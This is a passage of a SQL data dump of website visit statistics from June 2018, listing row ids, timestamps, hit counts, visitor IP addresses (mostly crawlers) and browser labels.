(255341,1528268338,1,1,0,0,'54.36.148.154','other'),(255342,1528268365,1,1,0,0,'54.36.149.37','other'),(255343,1528268381,2,2,0,0,'130.180.219.119','chrome'),(255344,1528268411,1,1,0,0,'95.132.17.30','firefox'),(255345,1528268836,1,1,0,0,'216.244.66.241','other'),(255346,1528269059,1,1,0,0,'54.36.148.248','other'),(255347,1528269093,1,1,0,0,'54.36.148.224','other'),(255348,1528269128,1,1,0,0,'40.77.167.194','other'),(255349,1528269136,1,1,0,0,'54.36.148.214','other'),(255350,1528269308,1,1,0,0,'62.205.134.182','other'),(255351,1528269765,1,1,0,0,'80.241.214.123','other'),(255352,1528269825,1,1,0,0,'54.36.148.171','other'),(255353,1528269830,1,1,0,0,'8.29.198.25','other'),(255354,1528269871,1,1,0,0,'54.36.149.72','other'),(255355,1528269880,1,1,0,0,'54.36.148.95','other'),(255356,1528269960,1,1,0,0,'54.36.149.96','other'),(255357,1528270070,1,1,0,0,'54.36.148.210','other'),(255358,1528270223,1,0,1,0,'66.249.66.155',''),(255359,1528270354,1,1,0,0,'54.36.148.24','other'),(255360,1528270371,1,0,1,0,'66.249.66.156',''),(255361,1528270459,1,1,0,0,'91.222.15.10','chrome'),(255362,1528270900,1,0,1,0,'66.249.66.157',''),(255363,1528271022,1,1,0,0,'54.36.149.26','other'),(255364,1528271154,1,1,0,0,'54.36.148.173','other'),(255365,1528271248,1,1,0,0,'54.36.149.54','other'),(255366,1528271267,1,1,0,0,'54.36.148.203','other'),(255367,1528271311,1,1,0,0,'54.36.148.249','other'),(255368,1528272077,1,1,0,0,'178.154.171.88','other'),(255369,1528272337,4,4,0,0,'216.244.66.241','other'),(255370,1528272455,1,1,0,0,'54.36.148.85','other'),(255371,1528272678,1,1,0,0,'54.36.148.189','other'),(255372,1528272910,1,1,0,0,'62.205.134.182','other'),(255373,1528273151,1,1,0,0,'178.154.171.88','other'),(255374,1528273222,1,1,0,0,'54.36.148.173','other'),(255375,1528273397,1,1,0,0,'54.36.149.0','other'),(255376,1528273416,1,1,0,0,'54.36.148.76','other'),(255377,1528273581,3,3,0,0,'216.244.66.241','other'),(255378,1528273672,1,1,0,0,'54.36.149.4','other'),(255379,1528273679,1,1,0,0,'54.36.149.94','other'),(255380,1528273978,1,1,0,0,'91.209.11.236','other'),(255381,1528273991,1,1,0,0,'54.36.148.250','other'),(255382,1528274022,1,1,0,0,'54.36.148.237','other'),(255383,1528274110,1,1,0,0,'162.210.196.97','other'),(255384,1528274166,1,1,0,0,'54.36.148.63','other'),(255385,1528274360,1,1,0,0,'54.36.148.136','other'),(255386,1528274809,1,1,0,0,'54.36.148.94','other'),(255387,1528275035,1,1,0,0,'8.29.198.25','other'),(255388,1528275065,1,1,0,0,'54.36.149.74','other'),(255389,1528275248,1,1,0,0,'54.36.148.16','other'),(255390,1528275333,2,2,0,0,'91.196.178.85','chrome'),(255391,1528275659,1,1,0,0,'54.36.148.140','other'),(255392,1528275727,1,1,0,0,'54.36.148.199','other'),(255393,1528275859,1,1,0,0,'54.36.149.24','other'),(255394,1528275863,2,2,0,0,'54.36.148.179','other'),(255395,1528275896,1,0,1,0,'66.249.66.155',''),(255396,1528276141,1,1,0,0,'54.36.149.44','other'),(255397,1528276311,2,2,0,0,'216.244.66.241','other'),(255398,1528276315,1,1,0,0,'54.36.148.152','other'),(255399,1528276342,1,1,0,0,'91.196.177.46','chrome'),(255400,1528276371,1,1,0,0,'54.36.148.215','other'),(255401,1528276509,1,1,0,0,'62.205.134.182','other'),(255402,1528276677,1,1,0,0,'54.36.148.125','other'),(255403,1528276691,1,1,0,0,'54.36.148.85','other'),(255404,1528276908,1,1,0,0,'54.36.148.87','other'),(255405,1528276910,1,1,0,0,'54.36.148.117','other'),(255406,1528276918,1,1,0,0,'54.36.148.255','other'),(255407,1528276958,1,1,0,0,'54.36.149.37','other'),(255408,1528276959,1,1,0,0,'54.36.149.73','other'),(255409,1528277233,1,0,1,0,'66.249.66.156',''),(255410,1528277240,1,1,0,0,'54.36.149.27','other'),(255411,1528277412,1,1,0,0,'54.36.148.171','other'),(255412,1528277492,1,1,0,0,'54.36.148.188','other'),(255413,1528277589,1,1,0,0,'91.196.178.94','firefox'),(255414,1528277784,1,1,0,0,'54.36.148.33','other'),(255415,1528277852,1,1,0,0,'54.36.148.99','other'),(255416,1528277888,2,2,0,0,'216.244.66.241','other'),(255417,1528277994,1,1,0,0,'54.36.149.47','other'),(255418,1528278179,1,0,1,0,'66.249.66.157',''),(255419,1528278338,1,1,0,0,'5.166.136.221','msie'),(255420,1528278378,1,1,0,0,'54.36.148.217','other'),(255421,1528278453,1,0,1,0,'66.249.66.155',''),(255422,1528278591,1,1,0,0,'54.36.149.38','other'),(255423,1528278679,1,1,0,0,'54.36.148.198','other'),(255424,1528278684,1,1,0,0,'54.36.148.135','other'),(255425,1528278935,1,1,0,0,'54.36.148.166','other'),(255426,1528278951,1,1,0,0,'216.244.66.241','other'),(255427,1528279146,1,1,0,0,'54.36.149.55','other'),(255428,1528279488,1,1,0,0,'78.111.186.70','firefox'),(255429,1528279763,1,1,0,0,'94.180.131.4','chrome'),(255430,1528279833,1,1,0,0,'54.36.148.228','other'),(255431,1528280111,1,1,0,0,'62.205.134.182','other'),(255432,1528280310,1,1,0,0,'54.36.149.59','other'),(255433,1528280426,1,1,0,0,'54.36.149.80','other'),(255434,1528280479,2,2,0,0,'216.244.66.241','other'),(255435,1528280543,2,2,0,0,'130.180.210.77','firefox'),(255436,1528280681,1,1,0,0,'8.29.198.26','other'),(255437,1528280771,1,1,0,0,'54.36.149.97','other'),(255438,1528281317,1,1,0,0,'207.46.13.186','other'),(255439,1528281573,1,1,0,0,'216.244.66.241','other'),(255440,1528281612,1,1,0,0,'54.36.148.151','other'),(255441,1528281613,1,1,0,0,'207.46.13.180','other'),(255442,1528281766,1,1,0,0,'54.36.148.114','other'),(255443,1528282074,1,1,0,0,'54.36.148.71','other'),(255444,1528282632,1,1,0,0,'54.36.149.34','other'),(255445,1528283163,1,1,0,0,'54.36.148.33','other'),(255446,1528283197,1,1,0,0,'91.192.135.241','firefox'),(255447,1528283249,1,1,0,0,'54.36.148.73','other'),(255448,1528283281,1,1,0,0,'54.36.148.21','other'),(255449,1528283648,1,1,0,0,'54.36.149.75','other'),(255450,1528283711,1,1,0,0,'62.205.134.182','other'),(255451,1528283760,1,1,0,0,'54.36.148.23','other'),(255452,1528283768,1,1,0,0,'54.36.148.82','other'),(255453,1528283795,1,1,0,0,'54.36.148.36','other'),(255454,1528283797,2,2,0,0,'216.244.66.241','other'),(255455,1528283818,1,1,0,0,'54.36.149.12','other'),(255456,1528283867,1,1,0,0,'54.36.148.128','other'),(255457,1528283892,1,1,0,0,'54.36.149.26','other'),(255458,1528284123,1,1,0,0,'54.36.148.238','other'),(255459,1528284258,1,1,0,0,'54.36.149.46','other'),(255460,1528284318,1,1,0,0,'54.36.149.92','other'),(255461,1528284436,1,1,0,0,'54.36.148.66','other'),(255462,1528284525,1,1,0,0,'54.36.148.134','other'),(255463,1528284637,1,1,0,0,'54.36.148.125','other'),(255464,1528284739,1,1,0,0,'54.36.149.42','other'),(255465,1528285008,1,1,0,0,'54.36.149.57','other'),(255466,1528285438,1,1,0,0,'95.47.151.97','firefox'),(255467,1528285709,1,1,0,0,'54.36.149.79','other'),(255468,1528285802,1,1,0,0,'37.52.247.211','chrome'),(255469,1528285876,1,1,0,0,'8.29.198.26','other'),(255470,1528285983,1,1,0,0,'54.36.148.169','other'),(255471,1528286097,1,0,1,0,'66.249.66.156',''),(255472,1528286100,1,1,0,0,'54.36.148.253','other'),(255473,1528286115,1,1,0,0,'54.36.148.186','other'),(255474,1528286221,1,1,0,0,'54.36.149.63','other'),(255475,1528286366,1,1,0,0,'54.36.148.132','other'),(255476,1528286384,1,1,0,0,'54.36.148.51','other'),(255477,1528286661,1,1,0,0,'193.106.30.99','firefox'),(255478,1528286674,1,1,0,0,'54.36.148.228','other'),(255479,1528286751,1,1,0,0,'54.36.148.92','other'),(255480,1528287149,1,1,0,0,'54.36.149.35','other'),(255481,1528287258,1,1,0,0,'54.36.148.137','other'),(255482,1528287310,1,1,0,0,'62.205.134.182','other'),(255483,1528287379,1,0,1,0,'66.249.66.157',''),(255484,1528287716,1,1,0,0,'54.36.148.124','other'),(255485,1528288080,1,1,0,0,'91.124.182.170','firefox'),(255486,1528288234,1,1,0,0,'54.36.148.137','other'),(255487,1528288474,1,1,0,0,'54.36.149.17','other'),(255488,1528288691,1,1,0,0,'89.28.200.118','chrome'),(255489,1528289000,1,1,0,0,'54.36.149.9','other'),(255490,1528289024,1,1,0,0,'54.36.148.174','other'),(255491,1528289428,1,1,0,0,'54.36.148.33','other'),(255492,1528289594,1,1,0,0,'54.36.148.100','other'),(255493,1528289661,1,1,0,0,'66.249.66.157','chrome'),(255494,1528289741,1,1,0,0,'54.36.149.93','other'),(255495,1528289780,1,1,0,0,'54.36.148.87','other'),(255496,1528289955,1,1,0,0,'54.36.148.123','other'),(255497,1528290096,1,1,0,0,'95.134.241.129','chrome'),(255498,1528290099,1,0,1,0,'66.249.66.156',''),(255499,1528290192,2,2,0,0,'178.95.101.211','firefox'),(255500,1528290218,1,1,0,0,'54.36.148.105','other'),(255501,1528290430,1,1,0,0,'157.55.39.184','other'),(255502,1528290463,1,1,0,0,'54.36.148.172','other'),(255503,1528290538,1,1,0,0,'54.36.149.91','other'),(255504,1528290547,1,1,0,0,'216.244.66.241','other'),(255505,1528290911,1,1,0,0,'62.205.134.182','other'),(255506,1528290917,2,2,0,0,'95.132.19.205','firefox'),(255507,1528291187,1,1,0,0,'92.96.38.152','other'),(255508,1528291532,1,1,0,0,'8.29.198.25','other'),(255509,1528291749,2,2,0,0,'216.244.66.241','other'),(255510,1528291817,1,1,0,0,'54.36.148.227','other'),(255511,1528291855,1,1,0,0,'54.36.148.243','other'),(255512,1528291904,1,1,0,0,'54.36.149.33','other'),(255513,1528292191,1,1,0,0,'157.55.39.184','other'),(255514,1528292368,1,1,0,0,'54.36.148.39','other'),(255515,1528292388,1,1,0,0,'54.36.149.69','other'),(255516,1528292395,1,1,0,0,'54.36.149.15','other'),(255517,1528292585,2,0,2,0,'66.249.66.155',''),(255518,1528292638,1,1,0,0,'54.36.148.115','other'),(255519,1528292793,1,1,0,0,'54.36.149.44','other'),(255520,1528292935,1,1,0,0,'54.36.148.130','other'),(255521,1528292944,1,1,0,0,'54.36.148.208','other'),(255522,1528293019,1,1,0,0,'216.244.66.241','other'),(255523,1528293121,1,1,0,0,'54.36.148.217','other'),(255524,1528293548,1,1,0,0,'54.36.148.147','other'),(255525,1528293606,1,1,0,0,'54.36.148.12','other'),(255526,1528293807,1,1,0,0,'54.36.149.79','other'),(255527,1528293808,1,1,0,0,'54.36.149.58','other'),(255528,1528294074,1,1,0,0,'194.44.94.23','chrome'),(255529,1528294108,1,1,0,0,'144.217.80.115','other'),(255530,1528294265,1,1,0,0,'54.36.148.223','other'),(255531,1528294310,1,1,0,0,'54.36.149.67','other'),(255532,1528294510,1,1,0,0,'62.205.134.182','other'),(255533,1528294781,1,0,1,0,'66.249.66.157',''),(255534,1528295320,1,1,0,0,'54.36.148.168','other'),(255535,1528295492,1,1,0,0,'54.36.149.36','other'),(255536,1528295730,1,1,0,0,'54.36.148.45','other'),(255537,1528295924,1,1,0,0,'54.36.148.188','other'),(255538,1528295939,1,1,0,0,'91.211.135.230','chrome'),(255539,1528295997,1,1,0,0,'54.36.148.20','other'),(255540,1528296096,1,1,0,0,'54.36.149.31','other'),(255541,1528296259,1,1,0,0,'141.8.142.74','other'),(255542,1528296602,2,2,0,0,'91.196.178.188','chrome'),(255543,1528296727,1,1,0,0,'8.29.198.27','other'),(255544,1528296803,2,2,0,0,'91.196.178.86','chrome'),(255545,1528296818,1,1,0,0,'54.36.149.102','other'),(255546,1528296826,10,10,0,0,'62.138.2.243','other'),(255547,1528296999,1,0,1,0,'66.249.66.76',''),(255548,1528297000,1,1,0,0,'54.36.148.225','other'),(255549,1528297395,1,1,0,0,'54.36.149.47','other'),(255550,1528297406,1,0,1,0,'66.249.66.155',''),(255551,1528297601,1,1,0,0,'54.36.148.65','other'),(255552,1528297631,1,1,0,0,'54.36.149.84','other'),(255553,1528297885,1,1,0,0,'40.77.167.137','other'),(255554,1528298027,1,1,0,0,'66.249.66.74','chrome'),(255555,1528298129,1,1,0,0,'37.73.52.218','chrome'),(255556,1528298147,1,1,0,0,'54.36.148.247','other'),(255557,1528298166,1,1,0,0,'54.36.148.26','other'),(255558,1528298387,1,1,0,0,'54.36.149.54','other'),(255559,1528298470,1,1,0,0,'54.36.148.232','other'),(255560,1528298648,1,1,0,0,'157.55.39.137','other'),(255561,1528298730,1,1,0,0,'54.36.149.68','other'),(255562,1528298873,1,1,0,0,'54.36.149.28','other'),(255563,1528299053,1,1,0,0,'54.36.148.166','other'),(255564,1528299129,1,0,1,0,'66.249.66.157',''),(255565,1528299317,1,1,0,0,'54.36.148.225','other'),(255566,1528299344,1,1,0,0,'91.196.178.72','firefox'),(255567,1528299534,1,1,0,0,'54.36.148.50','other'),(255568,1528299699,1,0,1,0,'66.249.66.76',''),(255569,1528300004,1,1,0,0,'54.36.148.122','other'),(255570,1528300047,1,1,0,0,'178.154.171.88','other'),(255571,1528300203,1,1,0,0,'54.36.148.143','other'),(255572,1528300329,1,1,0,0,'54.36.149.16','other'),(255573,1528300432,1,1,0,0,'54.36.148.224','other'),(255574,1528301104,1,1,0,0,'54.36.149.8','other'),(255575,1528301170,1,1,0,0,'54.36.149.61','other'),(255576,1528301173,1,1,0,0,'54.36.148.18','other'),(255577,1528301209,1,1,0,0,'180.76.15.14','other'),(255578,1528301495,1,1,0,0,'54.36.148.104','other'),(255579,1528301557,1,1,0,0,'54.36.148.60','other'),(255580,1528302220,1,1,0,0,'54.36.148.138','other'),(255581,1528302225,1,1,0,0,'54.36.148.127','other'),(255582,1528302366,1,1,0,0,'8.29.198.26','other'),(255583,1528302373,1,1,0,0,'54.36.149.22','other'),(255584,1528302379,1,1,0,0,'54.36.148.197','other'),(255585,1528302749,1,1,0,0,'54.36.148.13','other'),(255586,1528302899,1,0,1,0,'66.249.66.157',''),(255587,1528303573,1,1,0,0,'54.36.148.87','other'),(255588,1528303655,1,1,0,0,'54.36.148.26','other'),(255589,1528304193,1,1,0,0,'54.36.148.22','other'),(255590,1528304267,1,1,0,0,'54.36.148.228','other'),(255591,1528304383,1,1,0,0,'109.120.167.1','msie'),(255592,1528304387,1,1,0,0,'109.120.167.1','firefox'),(255593,1528304390,10,10,0,0,'109.120.167.1','opera'),(255594,1528304413,1,1,0,0,'178.154.171.88','other'),(255595,1528304415,1,1,0,0,'54.36.148.231','other'),(255596,1528304539,1,0,1,0,'66.249.66.157',''),(255597,1528304602,1,1,0,0,'54.36.148.193','other'),(255598,1528304726,1,1,0,0,'54.36.148.230','other'),(255599,1528304890,1,1,0,0,'54.36.148.192','other'),(255600,1528304955,1,1,0,0,'54.36.148.16','other'),(255601,1528304972,1,1,0,0,'54.36.148.255','other'),(255602,1528305002,1,1,0,0,'54.36.148.171','other'),(255603,1528305240,1,1,0,0,'188.230.43.254','other'),(255604,1528305248,2,2,0,0,'91.196.178.169','chrome'),(255605,1528305276,1,1,0,0,'54.36.148.190','other'),(255606,1528305506,1,1,0,0,'54.36.148.223','other'),(255607,1528305520,2,1,1,0,'66.249.66.156',''),(255608,1528305925,1,1,0,0,'54.36.148.133','other'),(255609,1528305928,1,1,0,0,'54.36.148.73','other'),(255610,1528306156,1,1,0,0,'54.36.148.91','other'),(255611,1528306276,1,1,0,0,'54.36.149.9','other'),(255612,1528306351,1,1,0,0,'54.36.148.116','other'),(255613,1528306504,1,1,0,0,'54.36.149.96','other'),(255614,1528306706,1,1,0,0,'54.36.149.14','other'),(255615,1528307020,1,1,0,0,'54.36.148.204','other'),(255616,1528307293,1,1,0,0,'54.36.148.145','other'),(255617,1528307560,1,1,0,0,'8.29.198.27','other'),(255618,1528307639,1,1,0,0,'188.230.43.254','other'),(255620,1528307759,1,1,0,0,'54.36.149.8','other'),(255621,1528307787,2,2,0,0,'178.154.171.88','other'),(255622,1528307791,1,1,0,0,'141.8.142.74','other'),(255623,1528307843,1,1,0,0,'54.36.148.116','other'),(255624,1528307962,1,1,0,0,'54.36.149.85','other'),(255625,1528308070,1,1,0,0,'54.36.149.12','other'),(255626,1528308201,1,1,0,0,'54.36.149.22','other'),(255627,1528308236,1,1,0,0,'54.36.148.250','other'),(255628,1528308281,1,1,0,0,'54.36.148.226','other'),(255629,1528308285,1,0,1,0,'66.249.66.157',''),(255630,1528308621,1,1,0,0,'54.36.148.138','other'),(255631,1528308690,1,0,1,0,'66.249.66.76',''),(255632,1528308726,1,1,0,0,'54.36.148.131','other'),(255633,1528308758,1,1,0,0,'95.163.255.7','other'),(255634,1528308902,1,1,0,0,'54.36.148.241','other'),(255635,1528308951,1,1,0,0,'54.36.148.12','other'),(255636,1528308970,1,1,0,0,'54.36.149.2','other'),(255637,1528309003,1,1,0,0,'141.8.142.74','other'),(255638,1528309152,1,1,0,0,'54.36.148.38','other'),(255639,1528309245,1,1,0,0,'193.106.30.99','firefox'),(255640,1528309326,1,1,0,0,'54.36.148.182','other'),(255641,1528309557,1,1,0,0,'54.36.149.14','other'),(255642,1528309869,1,1,0,0,'54.36.148.131','other'),(255643,1528309879,1,1,0,0,'91.209.11.236','other'),(255644,1528309977,1,1,0,0,'54.36.148.14','other'),(255645,1528310045,1,1,0,0,'188.230.43.254','other'),(255646,1528310061,2,0,2,0,'66.249.66.156',''),(255647,1528310215,1,1,0,0,'54.36.149.71','other'),(255648,1528310392,1,1,0,0,'54.36.148.178','other'),(255649,1528310591,1,1,0,0,'54.36.148.176','other'),(255650,1528310704,1,1,0,0,'54.36.149.99','other'),(255651,1528310791,1,1,0,0,'54.36.148.209','other'),(255652,1528310853,1,1,0,0,'54.36.148.204','other'),(255653,1528310892,1,1,0,0,'54.36.149.24','other'),(255654,1528311264,1,1,0,0,'54.36.149.37','other'),(255655,1528311386,1,0,1,0,'66.249.66.75',''),(255656,1528311705,1,1,0,0,'54.36.148.205','other'),(255657,1528311726,1,1,0,0,'54.36.148.129','other'),(255658,1528311923,1,1,0,0,'54.36.149.100','other'),(255659,1528311974,1,0,1,0,'66.249.66.155',''),(255660,1528312139,1,1,0,0,'54.36.148.163','other'),(255661,1528312172,1,1,0,0,'54.36.148.44','other'),(255662,1528312178,1,1,0,0,'54.36.149.103','other'),(255663,1528312251,1,1,0,0,'54.36.148.171','other'),(255664,1528312294,1,1,0,0,'54.36.148.228','other'),(255665,1528312313,1,1,0,0,'107.167.112.96','other'),(255666,1528312332,1,1,0,0,'54.36.148.236','other'),(255667,1528312341,1,1,0,0,'54.36.148.93','other'),(255668,1528312614,1,1,0,0,'141.8.142.74','other'),(255669,1528312615,1,1,0,0,'54.36.149.21','other'),(255670,1528312757,1,1,0,0,'54.36.148.27','other'),(255671,1528312864,1,1,0,0,'54.36.149.56','other'),(255672,1528313006,1,1,0,0,'54.36.148.46','other'),(255673,1528313127,4,4,0,0,'216.244.66.241','other'),(255674,1528313131,2,0,2,0,'66.249.66.156',''),(255675,1528313198,1,1,0,0,'8.29.198.25','other'),(255676,1528313234,1,1,0,0,'54.36.148.118','other'),(255677,1528313333,1,1,0,0,'54.36.148.231','other'),(255678,1528313335,1,1,0,0,'54.36.148.11','other'),(255679,1528313351,1,1,0,0,'54.36.148.242','other'),(255680,1528313438,1,1,0,0,'178.154.171.88','other'),(255681,1528313499,1,1,0,0,'54.36.148.55','other'),(255682,1528313657,1,1,0,0,'54.36.149.8','other'),(255683,1528313697,1,1,0,0,'54.36.149.105','other'),(255684,1528313776,1,1,0,0,'54.36.149.25','other'),(255685,1528313933,1,1,0,0,'54.36.149.23','other'),(255686,1528313964,1,0,1,0,'66.249.66.157',''),(255687,1528313993,1,1,0,0,'54.36.148.92','other'),(255688,1528314266,1,1,0,0,'54.36.148.137','other'),(255689,1528314424,1,1,0,0,'54.36.149.26','other'),(255690,1528314474,1,1,0,0,'54.36.149.92','other'),(255691,1528314484,1,1,0,0,'91.196.178.82','firefox'),(255692,1528314530,1,1,0,0,'54.36.148.25','other'),(255693,1528314974,1,0,1,0,'66.249.66.157',''),(255694,1528315024,1,1,0,0,'54.36.149.51','other'),(255695,1528315766,1,1,0,0,'54.36.148.119','other'),(255696,1528315768,1,1,0,0,'54.36.148.29','other'),(255697,1528316101,1,1,0,0,'54.36.148.68','other'),(255698,1528316288,1,1,0,0,'141.8.142.74','other'),(255699,1528316400,1,1,0,0,'54.36.148.171','other'),(255700,1528316450,1,1,0,0,'54.36.148.190','other'),(255701,1528316529,1,1,0,0,'54.36.148.26','other'),(255702,1528316558,1,1,0,0,'54.36.148.95','other'),(255703,1528316670,1,1,0,0,'13.57.220.0','chrome'),(255704,1528317034,2,1,1,0,'66.249.66.155',''),(255705,1528317090,1,1,0,0,'54.36.149.65','other'),(255706,1528317129,1,1,0,0,'54.36.148.88','other'),(255707,1528317140,1,1,0,0,'54.36.148.104','other'),(255708,1528317148,1,1,0,0,'54.36.148.162','other'),(255709,1528317218,1,1,0,0,'141.8.142.74','other'),(255710,1528317363,2,2,0,0,'178.154.171.88','other'),(255711,1528317373,1,1,0,0,'54.36.148.14','other'),(255712,1528317552,1,1,0,0,'54.36.149.0','other'),(255713,1528317706,1,1,0,0,'54.36.148.189','other'),(255714,1528317907,1,1,0,0,'216.244.66.241','other'),(255715,1528318210,1,1,0,0,'54.36.149.65','other'),(255716,1528318300,1,1,0,0,'54.36.148.139','other'),(255717,1528318319,1,1,0,0,'54.36.149.3','other'),(255718,1528318379,1,1,0,0,'54.36.148.249','other'),(255719,1528318389,1,1,0,0,'8.29.198.25','other'),(255720,1528318445,1,1,0,0,'54.36.148.141','other'),(255721,1528318450,1,0,1,0,'66.249.66.156',''),(255722,1528318680,1,1,0,0,'54.36.148.20','other'),(255723,1528318775,1,1,0,0,'180.76.15.160','other'),(255724,1528318823,1,0,1,0,'66.249.66.157',''),(255725,1528318985,1,1,0,0,'54.36.148.245','other'),(255726,1528319253,1,1,0,0,'95.163.255.6','other'),(255727,1528319474,1,1,0,0,'54.36.149.100','other'),(255728,1528319632,1,0,1,0,'66.249.66.156',''),(255729,1528319770,1,1,0,0,'54.36.148.90','other'),(255730,1528320369,1,1,0,0,'54.36.148.128','other'),(255731,1528320472,1,1,0,0,'54.36.148.133','other'),(255732,1528320658,1,1,0,0,'54.36.148.75','other'),(255733,1528320966,1,1,0,0,'54.36.148.110','other'),(255734,1528320968,1,0,1,0,'66.249.66.155',''),(255735,1528320971,1,1,0,0,'54.36.148.30','other'),(255736,1528321046,1,1,0,0,'54.36.148.117','other'),(255737,1528321103,1,1,0,0,'54.36.148.33','other'),(255738,1528321231,1,1,0,0,'178.9.123.80','chrome'),(255739,1528321259,1,1,0,0,'54.36.148.250','other'),(255740,1528321271,1,1,0,0,'54.36.149.41','other'),(255741,1528321385,7,7,0,0,'213.239.216.194','other'),(255742,1528321449,1,0,1,0,'66.249.66.157',''),(255743,1528321525,1,1,0,0,'54.36.148.232','other'),(255744,1528321669,2,2,0,0,'216.244.66.241','other'),(255745,1528321677,1,1,0,0,'54.36.149.83','other'),(255746,1528321944,1,1,0,0,'54.36.148.82','other'),(255747,1528322422,1,1,0,0,'54.36.149.63','other'),(255748,1528322778,1,1,0,0,'180.76.15.154','other'),(255749,1528322840,1,1,0,0,'54.36.148.100','other'),(255750,1528322878,1,1,0,0,'54.36.148.190','other'),(255751,1528323050,1,1,0,0,'54.36.148.61','other'),(255752,1528323086,1,1,0,0,'54.36.148.206','other'),(255753,1528323108,1,1,0,0,'54.36.149.66','other'),(255754,1528323253,1,1,0,0,'54.36.149.65','other'),(255755,1528323333,1,1,0,0,'54.36.148.232','other'),(255756,1528323418,1,1,0,0,'54.36.148.203','other'),(255757,1528323440,1,0,1,0,'66.249.66.155',''),(255758,1528323495,1,0,1,0,'66.249.66.157',''),(255759,1528323763,1,1,0,0,'54.36.149.62','other'),(255760,1528323778,1,1,0,0,'54.36.148.158','other'),(255761,1528323922,1,1,0,0,'37.145.64.253','msie'),(255762,1528323924,1,1,0,0,'54.36.148.96','other'),(255763,1528324051,1,1,0,0,'8.29.198.26','other'),(255764,1528324384,1,1,0,0,'54.36.149.76','other'),(255765,1528324564,1,1,0,0,'54.36.148.20','other'),(255766,1528324923,1,1,0,0,'54.36.148.141','other'),(255767,1528324968,2,1,1,0,'66.249.66.75',''),(255768,1528324978,1,1,0,0,'54.36.148.185','other'),(255769,1528325029,1,1,0,0,'54.83.166.109','other'),(255770,1528325069,1,1,0,0,'54.36.148.223','other'),(255771,1528325109,1,1,0,0,'54.36.148.97','other'),(255772,1528325525,1,1,0,0,'54.36.148.100','other'),(255773,1528325696,1,1,0,0,'54.36.149.104','other'),(255774,1528325794,1,1,0,0,'54.36.148.128','other'),(255775,1528325956,1,1,0,0,'54.36.149.69','other'),(255776,1528326056,1,1,0,0,'54.36.149.84','other'),(255777,1528326316,1,1,0,0,'54.36.148.167','other'),(255778,1528326552,1,1,0,0,'54.36.149.62','other'),(255779,1528326603,1,1,0,0,'54.36.149.3','other'),(255780,1528326726,1,1,0,0,'54.36.148.86','other'),(255781,1528326951,3,3,0,0,'216.244.66.241','other'),(255782,1528326968,1,1,0,0,'54.36.149.84','other'),(255783,1528327464,1,1,0,0,'54.36.148.55','other'),(255784,1528327494,1,1,0,0,'54.36.148.126','other'),(255785,1528327519,1,1,0,0,'54.36.148.243','other'),(255786,1528327742,1,1,0,0,'54.36.149.15','other'),(255787,1528327934,1,1,0,0,'54.36.148.39','other'),(255788,1528328162,1,1,0,0,'54.36.148.179','other'),(255789,1528328255,1,1,0,0,'54.36.148.19','other'),(255790,1528328423,4,4,0,0,'216.244.66.241','other'),(255791,1528328542,1,1,0,0,'54.36.148.31','other'),(255792,1528328768,1,1,0,0,'66.249.66.156','chrome'),(255793,1528329225,1,1,0,0,'8.29.198.27','other'),(255794,1528329238,1,1,0,0,'54.36.148.102','other'),(255795,1528329422,1,1,0,0,'54.36.148.39','other'),(255796,1528329604,1,1,0,0,'54.36.148.235','other'),(255797,1528329607,1,1,0,0,'54.36.148.223','other'),(255798,1528329686,3,3,0,0,'216.244.66.241','other'),(255799,1528329753,1,1,0,0,'54.36.149.35','other'),(255800,1528329788,1,1,0,0,'54.36.148.116','other'),(255801,1528330014,1,1,0,0,'54.36.148.16','other'),(255802,1528330104,1,1,0,0,'54.36.148.145','other'),(255803,1528330171,1,1,0,0,'54.36.149.12','other'),(255804,1528330301,1,1,0,0,'54.36.149.97','other'),(255805,1528330754,1,1,0,0,'91.209.11.236','other'),(255806,1528330912,1,1,0,0,'54.36.148.128','other'),(255807,1528331583,1,1,0,0,'54.36.148.171','other'),(255808,1528331662,2,2,0,0,'141.8.142.74','other'),(255809,1528331675,1,1,0,0,'54.36.149.81','other'),(255810,1528331757,1,0,1,0,'66.249.66.157',''),(255811,1528331824,1,1,0,0,'54.36.148.196','other'),(255812,1528331874,1,1,0,0,'54.36.148.58','other'),(255813,1528332086,1,1,0,0,'54.36.148.145','other'),(255814,1528332238,1,1,0,0,'54.36.148.30','other'),(255815,1528332244,1,1,0,0,'54.36.148.116','other'),(255816,1528332381,1,1,0,0,'216.244.66.241','other'),(255817,1528332922,1,1,0,0,'54.36.148.120','other'),(255818,1528333001,1,1,0,0,'54.36.148.119','other'),(255819,1528333017,1,1,0,0,'54.36.149.58','other'),(255820,1528333156,1,1,0,0,'54.36.148.161','other'),(255821,1528333212,1,1,0,0,'54.36.148.76','other'),(255822,1528333257,1,0,1,0,'66.249.66.74',''),(255823,1528333261,1,0,1,0,'66.249.66.157',''),(255824,1528333473,1,1,0,0,'54.36.148.46','other'),(255825,1528333521,2,2,0,0,'216.244.66.241','other'),(255826,1528333805,1,0,1,0,'66.249.66.156',''),(255827,1528334081,1,1,0,0,'54.36.148.218','other'),(255828,1528334139,1,1,0,0,'193.106.30.99','firefox'),(255829,1528334333,1,1,0,0,'54.36.148.32','other'),(255830,1528334459,1,1,0,0,'54.36.148.202','other'),(255831,1528334475,1,1,0,0,'54.36.148.130','other'),(255832,1528334614,1,1,0,0,'54.36.148.85','other'),(255833,1528334662,1,1,0,0,'207.46.13.89','other'),(255834,1528334813,3,3,0,0,'216.244.66.241','other'),(255835,1528334894,1,1,0,0,'8.29.198.26','other'),(255836,1528334993,1,1,0,0,'54.36.148.250','other'),(255837,1528334998,1,1,0,0,'54.36.148.251','other'),(255838,1528335124,1,1,0,0,'54.36.148.148','other'),(255839,1528335165,1,1,0,0,'54.36.148.192','other'),(255840,1528335293,1,1,0,0,'54.36.148.92','other'),(255841,1528335337,1,1,0,0,'54.36.148.16','other'),(255842,1528335754,1,1,0,0,'54.36.148.128','other'),(255843,1528336222,1,1,0,0,'216.244.66.241','other'),(255844,1528336583,1,1,0,0,'54.36.148.118','other'),(255845,1528336845,1,1,0,0,'54.36.149.59','other'),(255846,1528337022,1,1,0,0,'54.36.149.69','other'),(255847,1528337108,1,1,0,0,'54.36.149.29','other'),(255848,1528337180,1,1,0,0,'54.36.149.40','other'),(255849,1528337369,1,0,1,0,'66.249.66.156',''),(255850,1528337634,1,1,0,0,'54.36.148.238','other'),(255851,1528337927,1,1,0,0,'54.36.149.84','other'),(255852,1528337950,1,1,0,0,'216.244.66.241','other'),(255853,1528338126,1,1,0,0,'54.36.148.67','other'),(255854,1528338132,1,1,0,0,'54.36.148.251','other'),(255855,1528338159,1,1,0,0,'54.36.148.35','other'),(255856,1528338294,1,1,0,0,'54.36.149.61','other'),(255857,1528338296,5,5,0,0,'208.110.93.52','other'),(255858,1